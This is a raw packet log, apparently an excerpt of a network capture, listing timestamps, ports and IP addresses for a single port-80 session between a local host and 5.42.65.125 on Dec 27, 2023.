Dec 27, 2023 17:57:26.350342035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350342035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350356102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350368977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350368977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350388050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350389004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350403070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350405931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350416899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350430012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350440979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350444078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350461006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350470066 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350474119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350516081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350862980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350877047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350888014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350900888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350910902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350914955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350929022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350929022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350944042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350956917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.350958109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.350984097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351018906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351032019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351043940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351057053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351069927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351078987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351082087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351094961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351104975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351109028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351123095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351138115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351166010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351181984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351195097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351208925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351222038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351232052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351234913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351248980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351269960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351286888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351288080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351304054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351316929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351330042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351349115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351367950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351886034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351900101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351912975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351924896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351938009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351943970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351952076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351968050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351978064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.351980925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.351996899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352005959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352022886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352056026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352067947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352080107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352092981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352102041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352107048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352122068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352130890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352137089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352149963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352152109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352164984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352179050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352190018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352215052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352225065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352238894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352251053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352263927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352279902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352298021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352484941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352499962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352524042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352555990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352569103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352580070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352593899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352621078 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352621078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352634907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352648020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352660894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352669001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352703094 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352710009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352756023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352767944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352778912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352792025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352803946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352812052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352827072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352844954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352860928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352876902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352916002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352930069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352946997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352967978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352973938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.352977037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.352988005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353003025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353013992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353018045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353033066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353039980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353048086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353070974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353094101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353460073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353473902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353492022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353507996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353529930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353540897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353554964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353568077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353579998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353580952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353595972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353609085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353610039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353626013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353638887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353652000 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353660107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353663921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353681087 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353701115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353705883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353738070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353775024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353801012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353818893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353864908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353908062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353923082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353934050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353946924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353957891 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353959084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.353971958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.353976011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354001999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354372978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354386091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354397058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354415894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354437113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354465961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354477882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354490042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354501963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354515076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354518890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354533911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354547024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354547977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354559898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354573965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354576111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354588985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354599953 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354604959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354619026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354634047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354648113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354649067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354661942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354672909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354676962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354690075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354715109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354763985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354778051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354789972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354801893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354814053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354825974 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354829073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354836941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354852915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.354870081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.354965925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355312109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355328083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355340958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355354071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355364084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355370998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355405092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355417967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355433941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355446100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355458975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355472088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355479002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355499983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355499983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355514050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355514050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355531931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355556011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355663061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355676889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355690002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355716944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355741978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355777025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355828047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355843067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355854034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355865955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355869055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355880022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355892897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.355900049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.355935097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356062889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356110096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356123924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356134892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356152058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356164932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356173992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356194019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356208086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356237888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356252909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356256962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356426001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356440067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356451988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356465101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356470108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356481075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356497049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356498957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356511116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356523991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356535912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356538057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356550932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356564045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356569052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356579065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356580019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356595039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356609106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356612921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356626034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356638908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356642008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356652021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356664896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356678009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.356700897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.356724977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357144117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357161999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357176065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357189894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357209921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357219934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357223988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357237101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357238054 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357249975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357264996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357265949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357279062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357291937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357295036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357309103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357325077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357335091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357362986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357378006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357392073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357404947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357418060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357433081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357441902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357445955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357459068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357465029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357472897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357472897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357487917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357500076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357502937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357528925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357832909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357881069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357911110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357924938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357937098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357949972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357964039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357964993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.357976913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357990026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.357997894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.358006001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358015060 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.358020067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358053923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.358091116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358104944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358118057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358130932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358143091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358148098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.358155966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358170033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358174086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.358182907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.358196020 CET	80	49738	5.42.65.125	192.168.2.4
